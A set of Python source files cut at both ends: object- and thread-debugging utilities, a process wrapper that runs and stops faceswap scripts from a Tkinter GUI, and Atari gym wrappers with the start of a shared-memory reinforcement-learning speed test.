self.objTypes = {}
ObjTracker.allObjs[id(self)] = None
self.objs = [self.__dict__, self.startRefs, self.startCount, self.newRefs, self.persistentRefs, self.objTypes]
self.objs.append(self.objs)
for v in self.objs:
ObjTracker.allObjs[id(v)] = None
self.start()
def findNew(self, regex):
"""Return all objects matching regex that were considered 'new' when the last diff() was run."""
return self.findTypes(self.newRefs, regex)
def findPersistent(self, regex):
"""Return all objects matching regex that were considered 'persistent' when the last diff() was run."""
return self.findTypes(self.persistentRefs, regex)
def start(self):
"""
Remember the current set of objects as the comparison for all future calls to diff()
Called automatically on init, but can be called manually as well.
"""
refs, count, objs = self.collect()
for r in self.startRefs:
self.forgetRef(self.startRefs[r])
self.startRefs.clear()
self.startRefs.update(refs)
for r in refs:
self.rememberRef(r)
self.startCount.clear()
self.startCount.update(count)
#self.newRefs.clear()
#self.newRefs.update(refs)
def diff(self, **kargs):
"""
Compute all differences between the current object set and the reference set.
Print a set of reports for created, deleted, and persistent objects
"""
refs, count, objs = self.collect() ## refs contains the list of ALL objects
## Which refs have disappeared since call to start() (these are only displayed once, then forgotten.)
delRefs = {}
for i in list(self.startRefs.keys()):
if i not in refs:
delRefs[i] = self.startRefs[i]
del self.startRefs[i]
self.forgetRef(delRefs[i])
for i in list(self.newRefs.keys()):
if i not in refs:
delRefs[i] = self.newRefs[i]
del self.newRefs[i]
self.forgetRef(delRefs[i])
#print "deleted:", len(delRefs)
## Which refs have appeared since call to start() or diff()
persistentRefs = {} ## created since start(), but before last diff()
createRefs = {} ## created since last diff()
for o in refs:
if o not in self.startRefs:
if o not in self.newRefs:
createRefs[o] = refs[o] ## object has been created since last diff()
else:
persistentRefs[o] = refs[o] ## object has been created since start(), but before last diff() (persistent)
#print "new:", len(newRefs)
## self.newRefs holds the entire set of objects created since start()
for r in self.newRefs:
self.forgetRef(self.newRefs[r])
self.newRefs.clear()
self.newRefs.update(persistentRefs)
self.newRefs.update(createRefs)
for r in self.newRefs:
self.rememberRef(self.newRefs[r])
#print "created:", len(createRefs)
## self.persistentRefs holds all objects considered persistent.
self.persistentRefs.clear()
self.persistentRefs.update(persistentRefs)
print("----------- Count changes since start: ----------")
c1 = count.copy()
for k in self.startCount:
c1[k] = c1.get(k, 0) - self.startCount[k]
typs = list(c1.keys())
typs.sort(key=lambda a: c1[a])
for t in typs:
if c1[t] == 0:
continue
num = "%d" % c1[t]
print(" " + num + " "*(10-len(num)) + str(t))
print("----------- %d Deleted since last diff: ------------" % len(delRefs))
self.report(delRefs, objs, **kargs)
print("----------- %d Created since last diff: ------------" % len(createRefs))
self.report(createRefs, objs, **kargs)
print("----------- %d Created since start (persistent): ------------" % len(persistentRefs))
self.report(persistentRefs, objs, **kargs)
def __del__(self):
self.startRefs.clear()
self.startCount.clear()
self.newRefs.clear()
self.persistentRefs.clear()
del ObjTracker.allObjs[id(self)]
for v in self.objs:
del ObjTracker.allObjs[id(v)]
@classmethod
def isObjVar(cls, o):
return type(o) is cls or id(o) in cls.allObjs
def collect(self):
print("Collecting list of all objects...")
gc.collect()
objs = get_all_objects()
frame = sys._getframe()
del objs[id(frame)] ## ignore the current frame
del objs[id(frame.f_code)]
ignoreTypes = [int]
refs = {}
count = {}
for k in objs:
o = objs[k]
typ = type(o)
oid = id(o)
if ObjTracker.isObjVar(o) or typ in ignoreTypes:
continue
try:
ref = weakref.ref(obj)
except:
ref = None
refs[oid] = ref
typ = type(o)
typStr = typeStr(o)
self.objTypes[oid] = typStr
ObjTracker.allObjs[id(typStr)] = None
count[typ] = count.get(typ, 0) + 1
print("All objects: %d Tracked objects: %d" % (len(objs), len(refs)))
return refs, count, objs
def forgetRef(self, ref):
if ref is not None:
del ObjTracker.allObjs[id(ref)]
def rememberRef(self, ref):
## Record the address of the weakref object so it is not included in future object counts.
if ref is not None:
ObjTracker.allObjs[id(ref)] = None
def lookup(self, oid, ref, objs=None):
if ref is None or ref() is None:
try:
obj = lookup(oid, objects=objs)
except:
obj = None
else:
obj = ref()
return obj
def report(self, refs, allobjs=None, showIDs=False):
if allobjs is None:
allobjs = get_all_objects()
count = {}
rev = {}
for oid in refs:
obj = self.lookup(oid, refs[oid], allobjs)
if obj is None:
typ = "[del] " + self.objTypes[oid]
else:
typ = typeStr(obj)
if typ not in rev:
rev[typ] = []
rev[typ].append(oid)
c = count.get(typ, [0,0])
count[typ] = [c[0]+1, c[1]+objectSize(obj)]
typs = list(count.keys())
typs.sort(key=lambda a: count[a][1])
for t in typs:
line = " %d\t%d\t%s" % (count[t][0], count[t][1], t)
if showIDs:
line += "\t"+",".join(map(str,rev[t]))
print(line)
def findTypes(self, refs, regex):
allObjs = get_all_objects()
ids = {}
objs = []
r = re.compile(regex)
for k in refs:
if r.search(self.objTypes[k]):
objs.append(self.lookup(k, refs[k], allObjs))
return objs
def describeObj(obj, depth=4, path=None, ignore=None):
"""
Trace all reference paths backward, printing a list of different ways this object can be accessed.
Attempts to answer the question "who has a reference to this object"
"""
if path is None:
path = [obj]
if ignore is None:
ignore = {} ## holds IDs of objects used within the function.
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
printed=False
for ref in refs:
if id(ref) in ignore:
continue
if id(ref) in list(map(id, path)):
print("Cyclic reference: " + refPathString([ref]+path))
printed = True
continue
newPath = [ref]+path
if len(newPath) >= depth:
refStr = refPathString(newPath)
if '[_]' not in refStr: ## ignore '_' references generated by the interactive shell
print(refStr)
printed = True
else:
describeObj(ref, depth, newPath, ignore)
printed = True
if not printed:
print("Dead end: " + refPathString(path))
def typeStr(obj):
"""Create a more useful type string by making <instance> types report their class."""
typ = type(obj)
if typ == getattr(types, 'InstanceType', None):
return "<instance of %s>" % obj.__class__.__name__
else:
return str(typ)
def searchRefs(obj, *args):
"""Pseudo-interactive function for tracing references backward.
**Arguments:**
obj: The initial object from which to start searching
args: A set of string or int arguments.
each integer selects one of obj's referrers to be the new 'obj'
each string indicates an action to take on the current 'obj':
t: print the types of obj's referrers
l: print the lengths of obj's referrers (if they have __len__)
i: print the IDs of obj's referrers
o: print obj
ro: return obj
rr: return list of obj's referrers
Examples::
searchRefs(obj, 't') ## Print types of all objects referring to obj
searchRefs(obj, 't', 0, 't') ## ..then select the first referrer and print the types of its referrers
searchRefs(obj, 't', 0, 't', 'l') ## ..also print lengths of the last set of referrers
searchRefs(obj, 0, 1, 'ro') ## Select index 0 from obj's referrer, then select index 1 from the next set of referrers, then return that object
"""
ignore = {id(sys._getframe()): None}
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
refs = [r for r in refs if id(r) not in ignore]
for a in args:
#fo = allFrameObjs()
#refs = [r for r in refs if r not in fo]
if type(a) is int:
obj = refs[a]
gc.collect()
refs = gc.get_referrers(obj)
ignore[id(refs)] = None
refs = [r for r in refs if id(r) not in ignore]
elif a == 't':
print(list(map(typeStr, refs)))
elif a == 'i':
print(list(map(id, refs)))
elif a == 'l':
def slen(o):
if hasattr(o, '__len__'):
return len(o)
else:
return None
print(list(map(slen, refs)))
elif a == 'o':
print(obj)
elif a == 'ro':
return obj
elif a == 'rr':
return refs
def allFrameObjs():
"""Return list of frame objects in current stack. Useful if you want to ignore these objects in refernece searches"""
f = sys._getframe()
objs = []
while f is not None:
objs.append(f)
objs.append(f.f_code)
#objs.append(f.f_locals)
#objs.append(f.f_globals)
#objs.append(f.f_builtins)
f = f.f_back
return objs
def findObj(regex):
"""Return a list of objects whose typeStr matches regex"""
allObjs = get_all_objects()
objs = []
r = re.compile(regex)
for i in allObjs:
obj = allObjs[i]
if r.search(typeStr(obj)):
objs.append(obj)
return objs
def listRedundantModules():
"""List modules that have been imported more than once via different paths."""
mods = {}
for name, mod in sys.modules.items():
if not hasattr(mod, '__file__'):
continue
mfile = os.path.abspath(mod.__file__)
if mfile[-1] == 'c':
mfile = mfile[:-1]
if mfile in mods:
print("module at %s has 2 names: %s, %s" % (mfile, name, mods[mfile]))
else:
mods[mfile] = name
def walkQObjectTree(obj, counts=None, verbose=False, depth=0):
"""
Walk through a tree of QObjects, doing nothing to them.
The purpose of this function is to find dead objects and generate a crash
immediately rather than stumbling upon them later.
Prints a count of the objects encountered, for fun. (or is it?)
"""
if verbose:
print(" "*depth + typeStr(obj))
report = False
if counts is None:
counts = {}
report = True
typ = str(type(obj))
try:
counts[typ] += 1
except KeyError:
counts[typ] = 1
for child in obj.children():
walkQObjectTree(child, counts, verbose, depth+1)
return counts
QObjCache = {}
def qObjectReport(verbose=False):
"""Generate a report counting all QObjects and their types"""
global qObjCache
count = {}
for obj in findObj('PyQt'):
if isinstance(obj, QtCore.QObject):
oid = id(obj)
if oid not in QObjCache:
QObjCache[oid] = typeStr(obj) + " " + obj.objectName()
try:
QObjCache[oid] += " " + obj.parent().objectName()
QObjCache[oid] += " " + obj.text()
except:
pass
print("check obj", oid, str(QObjCache[oid]))
if obj.parent() is None:
walkQObjectTree(obj, count, verbose)
typs = list(count.keys())
typs.sort()
for t in typs:
print(count[t], "\t", t)
class PrintDetector(object):
"""Find code locations that print to stdout."""
def __init__(self):
self.stdout = sys.stdout
sys.stdout = self
def remove(self):
sys.stdout = self.stdout
def __del__(self):
self.remove()
def write(self, x):
self.stdout.write(x)
traceback.print_stack()
def flush(self):
self.stdout.flush()
def listQThreads():
"""Prints Thread IDs (Qt's, not OS's) for all QThreads."""
thr = findObj('[Tt]hread')
thr = [t for t in thr if isinstance(t, QtCore.QThread)]
import sip
for t in thr:
print("--> ", t)
print(" Qt ID: 0x%x" % sip.unwrapinstance(t))
def pretty(data, indent=''):
"""Format nested dict/list/tuple structures into a more human-readable string
This function is a bit better than pprint for displaying OrderedDicts.
"""
ret = ""
ind2 = indent + " "
if isinstance(data, dict):
ret = indent+"{\n"
for k, v in data.items():
ret += ind2 + repr(k) + ": " + pretty(v, ind2).strip() + "\n"
ret += indent+"}\n"
elif isinstance(data, list) or isinstance(data, tuple):
s = repr(data)
if len(s) < 40:
ret += indent + s
else:
if isinstance(data, list):
d = '[]'
else:
d = '()'
ret = indent+d[0]+"\n"
for i, v in enumerate(data):
ret += ind2 + str(i) + ": " + pretty(v, ind2).strip() + "\n"
ret += indent+d[1]+"\n"
else:
ret += indent + repr(data)
return ret
class ThreadTrace(object):
"""
Used to debug freezing by starting a new thread that reports on the
location of other threads periodically.
"""
def __init__(self, interval=10.0):
self.interval = interval
self.lock = Mutex()
self._stop = False
self.start()
def stop(self):
with self.lock:
self._stop = True
def start(self, interval=None):
if interval is not None:
self.interval = interval
self._stop = False
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def run(self):
while True:
with self.lock:
if self._stop is True:
return
print("\n============= THREAD FRAMES: ================")
for id, frame in sys._current_frames().items():
if id == threading.current_thread().ident:
continue
print("<< thread %d >>" % id)
traceback.print_stack(frame)
print("===============================================\n")
time.sleep(self.interval)
class ThreadColor(object):
"""
Wrapper on stdout/stderr that colors text by the current thread ID.
*stream* must be 'stdout' or 'stderr'.
"""
colors = {}
lock = Mutex()
def __init__(self, stream):
self.stream = getattr(sys, stream)
self.err = stream == 'stderr'
setattr(sys, stream, self)
def write(self, msg):
with self.lock:
cprint.cprint(self.stream, self.color(), msg, -1, stderr=self.err)
def flush(self):
with self.lock:
self.stream.flush()
def color(self):
tid = threading.current_thread()
if tid not in self.colors:
c = (len(self.colors) % 15) + 1
self.colors[tid] = c
return self.colors[tid]
def enableFaulthandler():
""" Enable faulthandler for all threads.
If the faulthandler package is available, this function disables and then
re-enables fault handling for all threads (this is necessary to ensure any
new threads are handled correctly), and returns True.
If faulthandler is not available, then returns False.
"""
try:
import faulthandler
# necessary to disable first or else new threads may not be handled.
faulthandler.disable()
faulthandler.enable(all_threads=True)
return True
except ImportError:
return False
|
wrapper.py
|
#!/usr/bin python3
""" Process wrapper for underlying faceswap commands for the GUI """
import os
import re
import signal
import subprocess
from subprocess import PIPE, Popen, TimeoutExpired
import sys
import tkinter as tk
from threading import Thread
from time import time
from .utils import Images
class ProcessWrapper(object):
""" Builds command, launches and terminates the underlying
faceswap process. Updates GUI display depending on state """
def __init__(self, statusbar, session=None, pathscript=None, cliopts=None):
self.tk_vars = self.set_tk_vars()
self.session = session
self.pathscript = pathscript
self.cliopts = cliopts
self.command = None
self.statusbar = statusbar
self.task = FaceswapControl(self)
def set_tk_vars(self):
""" TK Variables to be triggered by ProcessWrapper to indicate
what state various parts of the GUI should be in """
display = tk.StringVar()
display.set(None)
runningtask = tk.BooleanVar()
runningtask.set(False)
actioncommand = tk.StringVar()
actioncommand.set(None)
actioncommand.trace("w", self.action_command)
generatecommand = tk.StringVar()
generatecommand.set(None)
generatecommand.trace("w", self.generate_command)
consoleclear = tk.BooleanVar()
consoleclear.set(False)
return {"display": display,
"runningtask": runningtask,
"action": actioncommand,
"generate": generatecommand,
"consoleclear": consoleclear}
def action_command(self, *args):
""" The action to perform when the action button is pressed """
if not self.tk_vars["action"].get():
return
category, command = self.tk_vars["action"].get().split(",")
if self.tk_vars["runningtask"].get():
self.task.terminate()
else:
self.command = command
args = self.prepare(category)
self.task.execute_script(command, args)
self.tk_vars["action"].set(None)
def generate_command(self, *args):
""" Generate the command line arguments and output """
if not self.tk_vars["generate"].get():
return
category, command = self.tk_vars["generate"].get().split(",")
args = self.build_args(category, command=command, generate=True)
self.tk_vars["consoleclear"].set(True)
print(" ".join(args))
self.tk_vars["generate"].set(None)
def prepare(self, category):
""" Prepare the environment for execution """
self.tk_vars["runningtask"].set(True)
self.tk_vars["consoleclear"].set(True)
print("Loading...")
self.statusbar.status_message.set("Executing - "
+ self.command + ".py")
mode = "indeterminate" if self.command == "train" else "determinate"
self.statusbar.progress_start(mode)
args = self.build_args(category)
self.tk_vars["display"].set(self.command)
return args
def build_args(self, category, command=None, generate=False):
""" Build the faceswap command and arguments list """
command = self.command if not command else command
script = "{}.{}".format(category, "py")
pathexecscript = os.path.join(self.pathscript, script)
args = ["python"] if generate else ["python", "-u"]
args.extend([pathexecscript, command])
for cliopt in self.cliopts.gen_cli_arguments(command):
args.extend(cliopt)
if command == "train" and not generate:
self.set_session_stats(cliopt)
if command == "train" and not generate:
args.append("-gui") # Embed the preview pane
return args
def set_session_stats(self, cliopt):
""" Set the session stats for batchsize and modeldir """
if cliopt[0] == "-bs":
self.session.stats["batchsize"] = int(cliopt[1])
if cliopt[0] == "-m":
self.session.modeldir = cliopt[1]
def terminate(self, message):
""" Finalise wrapper when process has exited """
self.tk_vars["runningtask"].set(False)
self.statusbar.progress_stop()
self.statusbar.status_message.set(message)
self.tk_vars["display"].set(None)
Images().delete_preview()
if self.command == "train":
self.session.save_session()
self.session.__init__()
self.command = None
print("Process exited.")
class FaceswapControl(object):
""" Control the underlying Faceswap tasks """
__group_processes = ["effmpeg"]
def __init__(self, wrapper):
self.wrapper = wrapper
self.statusbar = wrapper.statusbar
self.command = None
self.args = None
self.process = None
self.consoleregex = {"loss": re.compile(r"([a-zA-Z_]+):.*?(\d+\.\d+)"),
"tqdm": re.compile(r"(\d+%|\d+/\d+|\d+:\d+|\d+\.\d+[a-zA-Z/]+)")}
def execute_script(self, command, args):
""" Execute the requested Faceswap Script """
self.command = command
kwargs = {"stdout": PIPE,
"stderr": PIPE,
"bufsize": 1,
"universal_newlines": True}
if self.command in self.__group_processes:
kwargs["preexec_fn"] = os.setsid
if os.name == "nt":
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
self.process = Popen(args, **kwargs)
self.thread_stdout()
self.thread_stderr()
def read_stdout(self):
""" Read stdout from the subprocess. If training, pass the loss
values to Queue """
while True:
output = self.process.stdout.readline()
if output == "" and self.process.poll() is not None:
break
if output:
if (self.command == "train" and self.capture_loss(output)) or (
self.command != "train" and self.capture_tqdm(output)):
continue
print(output.strip())
returncode = self.process.poll()
message = self.set_final_status(returncode)
self.wrapper.terminate(message)
def read_stderr(self):
""" Read stdout from the subprocess. If training, pass the loss
values to Queue """
while True:
output = self.process.stderr.readline()
if output == "" and self.process.poll() is not None:
break
if output:
if self.command != "train" and self.capture_tqdm(output):
continue
print(output.strip(), file=sys.stderr)
def thread_stdout(self):
""" Put the subprocess stdout so that it can be read without
blocking """
thread = Thread(target=self.read_stdout)
thread.daemon = True
thread.start()
def thread_stderr(self):
""" Put the subprocess stderr so that it can be read without
blocking """
thread = Thread(target=self.read_stderr)
thread.daemon = True
thread.start()
def capture_loss(self, string):
""" Capture loss values from stdout """
if not str.startswith(string, "["):
return False
loss = self.consoleregex["loss"].findall(string)
if len(loss) < 2:
return False
self.wrapper.session.add_loss(loss)
message = ""
for item in loss:
message += "{}: {} ".format(item[0], item[1])
if not message:
return False
elapsed = self.wrapper.session.timestats["elapsed"]
iterations = self.wrapper.session.stats["iterations"]
message = "Elapsed: {} Iteration: {} {}".format(elapsed,
iterations,
message)
self.statusbar.progress_update(message, 0, False)
return True
def capture_tqdm(self, string):
""" Capture tqdm output for progress bar """
tqdm = self.consoleregex["tqdm"].findall(string)
if len(tqdm) != 5:
return False
percent = tqdm[0]
processed = tqdm[1]
processtime = "Elapsed: {} Remaining: {}".format(tqdm[2], tqdm[3])
rate = tqdm[4]
message = "{} | {} | {} | {}".format(processtime,
rate,
processed,
percent)
current, total = processed.split("/")
position = int((float(current) / float(total)) * 1000)
self.statusbar.progress_update(message, position, True)
return True
def terminate(self):
""" Terminate the subprocess """
if self.command == "train":
print("Sending Exit Signal", flush=True)
try:
now = time()
if os.name == "nt":
os.kill(self.process.pid, signal.CTRL_BREAK_EVENT)
else:
self.process.send_signal(signal.SIGINT)
while True:
timeelapsed = time() - now
if self.process.poll() is not None:
break
if timeelapsed > 30:
raise ValueError("Timeout reached sending Exit Signal")
return
except ValueError as err:
print(err)
elif self.command in self.__group_processes:
print("Terminating Process Group...")
pgid = os.getpgid(self.process.pid)
try:
os.killpg(pgid, signal.SIGINT)
self.process.wait(timeout=10)
print("Terminated")
except TimeoutExpired:
print("Termination timed out. Killing Process Group...")
os.killpg(pgid, signal.SIGKILL)
print("Killed")
else:
print("Terminating Process...")
try:
self.process.terminate()
self.process.wait(timeout=10)
print("Terminated")
except TimeoutExpired:
print("Termination timed out. Killing Process...")
self.process.kill()
print("Killed")
def set_final_status(self, returncode):
""" Set the status bar output based on subprocess return code """
if returncode == 0 or returncode == 3221225786:
status = "Ready"
elif returncode == -15:
status = "Terminated - {}.py".format(self.command)
elif returncode == -9:
status = "Killed - {}.py".format(self.command)
elif returncode == -6:
status = "Aborted - {}.py".format(self.command)
else:
status = "Failed - {}.py. Return Code: {}".format(self.command,
returncode)
return status
|
shared_memory_speed_test.py
|
# https://github.com/facebookresearch/torchbeast/blob/master/torchbeast/core/environment.py
import numpy as np
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
"""
Warp frames to 84x84 as done in the Nature paper and later work.
If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
observation should be warped.
"""
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
self._key = dict_space_key
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(
low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8,
)
if self._key is None:
original_space = self.observation_space
self.observation_space = new_space
else:
original_space = self.observation_space.spaces[self._key]
self.observation_space.spaces[self._key] = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._key is None:
frame = obs
else:
frame = obs[self._key]
if self._grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
frame = cv2.resize(
frame, (self._width, self._height), interpolation=cv2.INTER_AREA
)
if self._grayscale:
frame = np.expand_dims(frame, -1)
if self._key is None:
obs = frame
else:
obs = obs.copy()
obs[self._key] = frame
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also
--------
baselines.common.atari_wrappers.LazyFrames
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=((shp[0] * k,)+shp[1:]), dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
# careful! This undoes the memory optimization, use
# with smaller replay buffers only.
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are only stored once.
It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay
buffers.
This object should only be converted to numpy array before being passed to the model.
You'd not believe how complex the previous solution was."""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=0)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def wrap_atari(env, max_episode_steps=None):
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
assert max_episode_steps is None
return env
class ImageToPyTorch(gym.ObservationWrapper):
"""
Image shape to channels x weight x height
"""
def __init__(self, env):
super(ImageToPyTorch, self).__init__(env)
old_shape = self.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=255,
shape=(old_shape[-1], old_shape[0], old_shape[1]),
dtype=np.uint8,
)
def observation(self, observation):
return np.transpose(observation, axes=(2, 0, 1))
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
env = ImageToPyTorch(env)
if frame_stack:
env = FrameStack(env, 4)
return env
# Reference: https://www.cs.toronto.edu/~vmnih/docs/dqn.pdf
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
from torch.utils.tensorboard import SummaryWriter
import argparse
from distutils.util import strtobool
import collections
import numpy as np
import gym
from gym.wrappers import TimeLimit, Monitor
from gym.spaces import Discrete, Box, MultiBinary, MultiDiscrete, Space
import time
import random
import os
# import threading
# os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
from torch import multiprocessing as mp
from multiprocessing.managers import SyncManager, SharedMemoryManager
from multiprocessing.shared_memory import SharedMemory
from stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnvWrapper
from faster_fifo import Queue as MpQueue
from torch.multiprocessing import Process as TorchProcess
torch.multiprocessing.set_sharing_strategy('file_system')
class SharedNDArray(np.ndarray):
def set_shm(self, shm):
self.shm = shm
def close(self):
self.shm.close()
def unlink(self):
self.shm.unlink()
def share_memory(arr):
shm = SharedMemory(create=True, size=arr.nbytes)
shm_arr = SharedNDArray(arr.shape, dtype=arr.dtype, buffer=shm.buf)
shm_arr[:] = arr[:]
shm_arr.set_shm(shm)
return shm_arr
def share_memory(arr):
t = torch.tensor(arr)
t.share_memory_()
return t
class Actor:
def __init__(self, inputs):
self.inputs = inputs
self.process = TorchProcess(target=self.act, daemon=True)
self.process.start()
def act(self):
# print(torch.ones((12,23,42)).sum())
torch.multiprocessing.set_sharing_strategy('file_system')
args, experiment_name, i, lock, stats_queue, device, \
obs, obs_sm, logprobs, rewards, dones, values = self.inputs
obs = to_numpy(obs_sm, 5)
envs = []
# o = np.ones((210, 160, 3))
# print(o.sum())
# print(torch.ones((84,160,3)).sum())
# raise
def make_env(gym_id, seed, idx):
env = gym.make(gym_id)
env = wrap_atari(env)
env = gym.wrappers.RecordEpisodeStatistics(env)
env = wrap_deepmind(
env,
clip_rewards=True,
frame_stack=True,
scale=False,
)
env.seed(seed)
env.action_space.seed(seed)
env.observation_space.seed(seed)
return env
envs = [make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)]
envs = np.array(envs, dtype=object)
for env_idx, env in enumerate(envs):
env.reset()
# print('Process %d finished resetting %d/%d envs', env_idx + 1, len(envs))
last_report = last_report_frames = total_env_frames = 0
while True:
for env_idx, env in enumerate(envs):
# os = []
for step in range(args.num_steps):
action = env.action_space.sample()
o, r, d, info = env.step(action)
if d:
o = env.reset()
# os += [o]
# print(obs[i,env_idx,0,0,step].shape, torch.from_numpy(o).shape)
# raise
# o = np.ones((210, 160, 3))
# obs[i,env_idx,0,0,step] = o
# print("before", id(obs[i,env_idx,0,0,step]), i, env_idx, step)
# t =
obs[i,env_idx,0,0,step].copy_(torch.from_numpy(np.array(o)))
# print(torch.from_numpy(np.array(o)).sum(), obs[i,env_idx,0,0,step].sum(), i, env_idx, step)
# print(obs[i,env_idx,0,0,step].sum(), i, env_idx, step)
# print(id(obs[i,env_idx,0,0,step]), i, env_idx, step)
# print(id(obs_sm))
# # print(obs_sm.sum())
# raise
# rewards[i,env_idx,0,0,step] = r
# dones[i,env_idx,0,0,step] = d
num_frames = 1
total_env_frames += num_frames
if 'episode' in info.keys():
stats_queue.put(info['episode']['l'])
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='DQN agent')
# Common arguments
parser.add_argument('--exp-name', type=str, default=os.path.basename(__file__).rstrip(".py"),
help='the name of this experiment')
parser.add_argument('--gym-id', type=str, default="BreakoutNoFrameskip-v4",
help='the id of the gym environment')
parser.add_argument('--learning-rate', type=float, default=1e-4,
help='the learning rate of the optimizer')
parser.add_argument('--seed', type=int, default=2,
help='seed of the experiment')
parser.add_argument('--total-timesteps', type=int, default=100000000,
help='total timesteps of the experiments')
parser.add_argument('--torch-deterministic', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, `torch.backends.cudnn.deterministic=False`')
parser.add_argument('--cuda', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, cuda will not be enabled by default')
